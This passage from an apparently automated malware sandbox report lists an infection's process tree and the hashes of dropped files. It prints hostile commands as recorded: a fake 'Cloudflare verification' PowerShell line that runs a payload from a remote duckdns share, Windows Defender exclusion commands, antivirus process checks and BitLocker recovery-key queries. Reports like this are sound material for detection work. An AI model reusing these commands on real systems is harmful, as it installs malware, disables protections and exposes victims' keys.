                                                      "C:\Users\Admin\AppData\Local\Temp\10450180101\66a7aa70aa.exe"
                                                      3⤵
                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • Modifies Windows Defender TamperProtection settings
                                                      • Modifies Windows Defender notification settings
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2504
                                                    • C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:1740
                                                    • C:\Users\Admin\AppData\Local\Temp\10450200101\ab0e067345.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10450200101\ab0e067345.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1976
                                                    • C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"
                                                      3⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6960
                                                      • C:\Windows\SysWOW64\CMD.exe
                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6604
                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                          tasklist
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6952
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr /I "opssvc wrsa"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:6956
                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                          tasklist
                                                          5⤵
                                                          • Enumerates processes with tasklist
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6840
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:7044
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c md 418377
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:7084
                                                        • C:\Windows\SysWOW64\extrac32.exe
                                                          extrac32 /Y /E Leon.cab
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:7128
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr /V "BEVERAGES" Compilation
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5388
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5368
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2692
                                                        • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                          Passwords.com N
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:3632
                                                        • C:\Windows\SysWOW64\choice.exe
                                                          choice /d y /t 5
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5064
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6348
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5192
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1044
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                                                            6⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5116
                                                          • \??\UNC\aaso12.duckdns.org\shear\s.exe
                                                            \\aaso12.duckdns.org\shear\s -fullinstall
                                                            6⤵
                                                            • Sets service image path in registry
                                                            • Drops file in Program Files directory
                                                            PID:2140
                                                    • C:\Users\Admin\AppData\Local\Temp\10450230101\e1d4d40336.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10450230101\e1d4d40336.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2408
                                                    • C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:7016
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                        4⤵
                                                          PID:2100
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:6912
                                                        • C:\Windows\system32\svchost.exe
                                                          "C:\Windows\system32\svchost.exe"
                                                          4⤵
                                                          • Downloads MZ/PE file
                                                          • Adds Run key to start application
                                                          PID:6812
                                                      • C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:6196
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          4⤵
                                                            PID:4908
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                            4⤵
                                                              PID:832
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:6960
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBtAHAAUABSAGUARgBlAFIARQBuAEMARQAgAC0AZQB4AEMAbAB1AFMAaQBPAG4AcABBAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAGYATwByAEMARQA7ACAAQQBkAGQALQBNAHAAcAByAEUARgBFAFIAZQBOAGMAZQAgAC0ARQB4AEMAbAB1AFMAaQBvAG4AUABSAE8AQwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAGYAbwBSAEMARQA=
                                                        1⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1680
                                                      • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                        "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        • Drops file in Program Files directory
                                                        • Modifies data under HKEY_USERS
                                                        PID:3484
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -noprofile -nologo -command -
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3116
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -noprofile -nologo -command -
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:6016
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -noprofile -nologo -command -
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1432
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -noprofile -nologo -command -
                                                          2⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5276
                                                        • C:\Windows\system32\cmd.exe
                                                          /c manage-bde -protectors -get C: -Type recoverypassword
                                                          2⤵
                                                            PID:2600
                                                            • C:\Windows\system32\manage-bde.exe
                                                              manage-bde -protectors -get C: -Type recoverypassword
                                                              3⤵
                                                                PID:4784
                                                            • C:\Windows\system32\cmd.exe
                                                              /c manage-bde -protectors -get F: -Type recoverypassword
                                                              2⤵
                                                                PID:3020
                                                                • C:\Windows\system32\manage-bde.exe
                                                                  manage-bde -protectors -get F: -Type recoverypassword
                                                                  3⤵
                                                                    PID:5904
                                                              • C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
                                                                C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4332
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                  2⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3776
                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5204
                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                1⤵
                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                • Checks BIOS information in registry
                                                                • Executes dropped EXE
                                                                • Identifies Wine through registry keys
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5320
                                                              • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                                "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                • Drops file in Program Files directory
                                                                • Modifies data under HKEY_USERS
                                                                PID:7092
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -noprofile -nologo -command -
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2396
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -noprofile -nologo -command -
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:6192
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -noprofile -nologo -command -
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:6456
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -noprofile -nologo -command -
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3168
                                                                • C:\Windows\system32\cmd.exe
                                                                  /c manage-bde -protectors -get C: -Type recoverypassword
                                                                  2⤵
                                                                    PID:5952
                                                                    • C:\Windows\system32\manage-bde.exe
                                                                      manage-bde -protectors -get C: -Type recoverypassword
                                                                      3⤵
                                                                        PID:6492
                                                                    • C:\Windows\system32\cmd.exe
                                                                      /c manage-bde -protectors -get F: -Type recoverypassword
                                                                      2⤵
                                                                        PID:6544
                                                                        • C:\Windows\system32\manage-bde.exe
                                                                          manage-bde -protectors -get F: -Type recoverypassword
                                                                          3⤵
                                                                            PID:6564
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                        1⤵
                                                                          PID:7100
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                          1⤵
                                                                            PID:7144

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files\Mesh Agent\MeshAgent.db

                                                                            Filesize

                                                                            154KB

                                                                            MD5

                                                                            8ff50d0e7d0e4d46e8505ebc7aff902d

                                                                            SHA1

                                                                            f1c0b56cdc677f3164317990604e7bc209a9ccfc

                                                                            SHA256

                                                                            944194e6103d07c093879fb39b07487431ee947aa6b3b1ca75391c7d335fb921

                                                                            SHA512

                                                                            837a60cb48e43e0f3cb50394b00f691b6bf96805deac65a2154e980be3dee115134edfdb432fe44172c684e7adfc9c51b25038a768a650216ed31973de52b9ef

                                                                          • C:\Program Files\Mesh Agent\MeshAgent.db.tmp

                                                                            Filesize

                                                                            154KB

                                                                            MD5

                                                                            838cb3f856cc1ab94dc4d28e2ddb184a

                                                                            SHA1

                                                                            139853756ebbf08e0f4607718071088ef8b00bf6

                                                                            SHA256

                                                                            961edc06ae83733248c80b383f59535658d4f02fe3d0ea7a9272a142484bf605

                                                                            SHA512

                                                                            913cce6a930b386c273a49a6611d972c0a63c916db6bfaa11bf96d3d85dbd74447506afb6557efbe22966c478ecbe557503be21d23d814e07ecf1d17105fff95

                                                                          • C:\Program Files\Mesh Agent\MeshAgent.exe

                                                                            Filesize

                                                                            3.3MB

                                                                            MD5

                                                                            91424f307b7f0e238aab1f06434a7dc4

                                                                            SHA1

                                                                            4fb5ec3082d3545a79e2ccbd4b624320cafd68f1

                                                                            SHA256

                                                                            cdc2aa09167bd32f9a01eb60414d0b8faaf8616b9a23a7fc1671bb6bc7f162a1

                                                                            SHA512

                                                                            6830052ce91c378e7e21c385fb9a522f57fa59d1082a460a26199dbcfa808b37abad741eb8bf7dfd746d522d37dc03ac9d1674fb429f988873eb6a53fde93f83

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7q8Wm5h.exe.log

                                                                            Filesize

                                                                            838B

                                                                            MD5

                                                                            0a743d6c57450a2d49a29271195f3356

                                                                            SHA1

                                                                            2f412841f6c0e365b5f08a22772254b07934d17d

                                                                            SHA256

                                                                            09c2a373e9885355f76bf3a42e13d83510d1dfdaa02f507de28d25fdd46c681d

                                                                            SHA512

                                                                            aa61e62eee06bdf358ccd27bc855ed0f9dc16a0240b3b2bb431aa67a51c0a90a1e58cb23048063b6a69a9d177aab07f7950c77d385fb11969952513cdc8e060d

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            def65711d78669d7f8e69313be4acf2e

                                                                            SHA1

                                                                            6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                            SHA256

                                                                            aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                            SHA512

                                                                            05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H91JNNJV\soft[1]

                                                                            Filesize

                                                                            3.0MB

                                                                            MD5

                                                                            91f372706c6f741476ee0dac49693596

                                                                            SHA1

                                                                            8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                            SHA256

                                                                            9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                            SHA512

                                                                            88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MHD417D2\success[1].htm

                                                                            Filesize

                                                                            1B

                                                                            MD5

                                                                            cfcd208495d565ef66e7dff9f98764da

                                                                            SHA1

                                                                            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                            SHA256

                                                                            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                            SHA512

                                                                            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            15KB

                                                                            MD5

                                                                            93f5c75aa1bdf287f30310bc30411f31

                                                                            SHA1

                                                                            b723b6faafa6524782ccccf3d706eaf3e6ba77b6

                                                                            SHA256

                                                                            e8e3b193554dc18f5f49e4a70174607121d0624783a02a1f804d02281dbfa222

                                                                            SHA512

                                                                            d50365ab0510ffecbccbb05bb38ab24a2984c156cd0f2503c1b118437aff796e18826f63c72a97e80ae22a194afda4eb9bdbfd923888c42be475e5715dc11cec

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            51190d05fb9f177e94cc296a2a0e1580

                                                                            SHA1

                                                                            2dcea43ac7d7a3a54eb555becafd5b5812e342db

                                                                            SHA256

                                                                            f2ba8c3e5f857cd9e521d95daa21e6281c2678da281282902339dfb9f8a7c5df

                                                                            SHA512

                                                                            97b10df606f4a572d308028e2d2daa698570ac49d8c952ffc4423ea7f321a775663eec49ae521bf5fdc4ded3938810c41fe910cbed0dea2de46ce47e117aefa6

                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\0o5pj305.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                            Filesize

                                                                            13KB

                                                                            MD5

                                                                            0963bfd7bc442ef3a2e5c6eff846ae5f

                                                                            SHA1

                                                                            6a2806b490a6bdca00b71b8a4dae4b1ced61957e

                                                                            SHA256

                                                                            f9b1998140a2e07b36968b6112751482fb2f3adc464fd8e100214d43ba74a8f4

                                                                            SHA512

                                                                            801bcb4b6143d6fdd111ef58f8dd522d70cae20ac4d37f3447d8fa3da8de62d220e609e923df1b495cec657d6b754088101450a6b42fc38dbedc8f1868b8f83c

                                                                          • C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe

                                                                            Filesize

                                                                            4.1MB

                                                                            MD5

                                                                            84ea163232f5b470ee2ff0376db19cbc

                                                                            SHA1

                                                                            518a9092be2c92364ce1f2ea85c80bbed5da0bbe

                                                                            SHA256

                                                                            0328d4ba6d9351da17c443823167a0d76e3cb86e39f03af6b9a22076463f3ad6

                                                                            SHA512

                                                                            d8978878501305d46e90e3d7657177303de54ade525ffc647067ae2b63cf0cea6e1c65cbf5ad180dad11e5fd80d8f54c970f0c51357331a7b12670b03c50b624

                                                                          • C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe

                                                                            Filesize

                                                                            655KB

                                                                            MD5

                                                                            8be309beb3b1ad2b6b49b5a08702cfc2

                                                                            SHA1

                                                                            e579f46024d71ec258fa9851f2d79688cae24b3d

                                                                            SHA256

                                                                            5efeaaa2e83da921f6b52d0d82cc5038229b1306c8020072794e8c08fd1e51d7

                                                                            SHA512

                                                                            e1b21078da69b1a00475af10a3eddde0d5e797998280bdfeef371845ecc9098aa7344ed22595e0ae0cdc6a1d3342181648334a0e860f1fdb243b4b4577c8883a

                                                                          • C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd

                                                                            Filesize

                                                                            258B

                                                                            MD5

                                                                            883dc2eefa3767f2644fc6d3b3e55768

                                                                            SHA1

                                                                            21840ca7cb5b86db35879df43d6b2760e198ba5b

                                                                            SHA256

                                                                            ec5e54764cd4136d7b20c16f79275da7b303e845d061fe7bd8f01bc34b1c3e91

                                                                            SHA512

                                                                            e6951cc2c0c81b25e430d6fe13a17b5c8ec81b70ad3c345338ab16b7a4711c43991abccb3d259b1860ba17d14bad82f6a66ddcecf6b3e38ec326c931e3747989

                                                                          • C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe

                                                                            Filesize

                                                                            327KB

                                                                            MD5

                                                                            17b045d3037b19362f5710ef08a1c3a9

                                                                            SHA1

                                                                            b510e63483354299a982f8c8b8425e1611f60ad4

                                                                            SHA256

                                                                            ca1cf8c31abcbf6fa6d324098c97bea8452da24cfcf579a52a3d262c93a85557

                                                                            SHA512

                                                                            cd96011398083f83d0869df41acf62cc8ccb69ea92b5c83066098f4227aa60bf37af16c4b5118cb5497202c8f78ab4703c9d8acf61ca41f3512d882dd5f79ac0

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450110101\1d96eeb059.exe

                                                                            Filesize

                                                                            5.9MB

                                                                            MD5

                                                                            e05432c13d42b8526ce4bc0dc240d297

                                                                            SHA1

                                                                            db6e9382425055030662ecdc95d6405d30dcf82a

                                                                            SHA256

                                                                            574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

                                                                            SHA512

                                                                            56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450120101\268a518848.exe

                                                                            Filesize

                                                                            4.3MB

                                                                            MD5

                                                                            be08ec0b05c185533de81aaab4f84971

                                                                            SHA1

                                                                            3063abb31a733c12867d29ad47caba5fbab5055d

                                                                            SHA256

                                                                            7b4c1733affd0ccf9ef1cf6a6a7d352b3b61fbd021cd8a6f84f4ec514dfa3e90

                                                                            SHA512

                                                                            a59bac6ab569c7339a50db15439b08bffeedf3f36d90b2244c50d6f74148b9e838ea18bfc0ff260ba3141359cc21c93965f1cd9ef8762c889329366806b2f4fc

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe

                                                                            Filesize

                                                                            7.3MB

                                                                            MD5

                                                                            4c1e985ca22c2a899aef2eb4c3995f93

                                                                            SHA1

                                                                            40f1dcbda8fca4792b9cf1303357c5a7ec4b2e99

                                                                            SHA256

                                                                            947c2577b0f00e15299cbe32bbc22b2652bb76fe3d9a56531cb5d0276218a36a

                                                                            SHA512

                                                                            c82e5301ab7ed347546f561ecf41135da5378bc5e999e1c296c69e8ede2d41c941617e80abcd2777688e9bcdfc635ba2ee55b938aaa6eba7d2d2ceffd84b46e0

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450150101\abb6489dab.exe

                                                                            Filesize

                                                                            2.0MB

                                                                            MD5

                                                                            161ad320976e560036b4136f496512ff

                                                                            SHA1

                                                                            f5df128cb8bcc179bcea77d8e940a72b9da875ba

                                                                            SHA256

                                                                            eb7c64826954be0e43fec4486fe5b92976ef207570c6b60925bb200a1c7b0ffa

                                                                            SHA512

                                                                            df61c226b710b8aee9330a1dd0f79a1d5d7b2ef4eaff3f8b51fff630fe4dfe0913f137ed30a6241515a6449cb5ae666aaefd3e2418537b45967ec49e57b258fd

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450160101\a6c25b1806.exe

                                                                            Filesize

                                                                            2.4MB

                                                                            MD5

                                                                            4638932f5bb908e695aa4c636976d11b

                                                                            SHA1

                                                                            c378bfaabf00c123d3bda646ba7347a1f1ef13ad

                                                                            SHA256

                                                                            176cb721e95f550526aa060f4eb99140abd4b5b2784ff5f1dee8ad340fb2644d

                                                                            SHA512

                                                                            38a0f9ef0cf33a3543b8af7d3bb895925ea23a6cd30f92b0b49b6be85611d1c49b2a568f92a8de3a06e35d73ba83cdc423f86a1eb247ffdc7671ba90ae2cbc63

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450170101\7d66731089.exe

                                                                            Filesize

                                                                            942KB

                                                                            MD5

                                                                            e5969632bb235168a786743b4cf375c3

                                                                            SHA1

                                                                            bcab1fcb7b4b24fc351c1ed50821750489ce2b22

                                                                            SHA256

                                                                            a0b274582b110d8cf83d97b6193abee3bdfe9153a979192659ce5cc2fdf75137

                                                                            SHA512

                                                                            b63c534345ee64d499cd738ea742300454f5a036d575b1b825a28be268507915deafec1d8e3fae5cc6e8e59a6bf95357258db87cdfdfc3b1f2382e5ee192cabf

                                                                          • C:\Users\Admin\AppData\Local\Temp\10450180101\66a7aa70aa.exe

                                                                            Filesize

                                                                            1.7MB

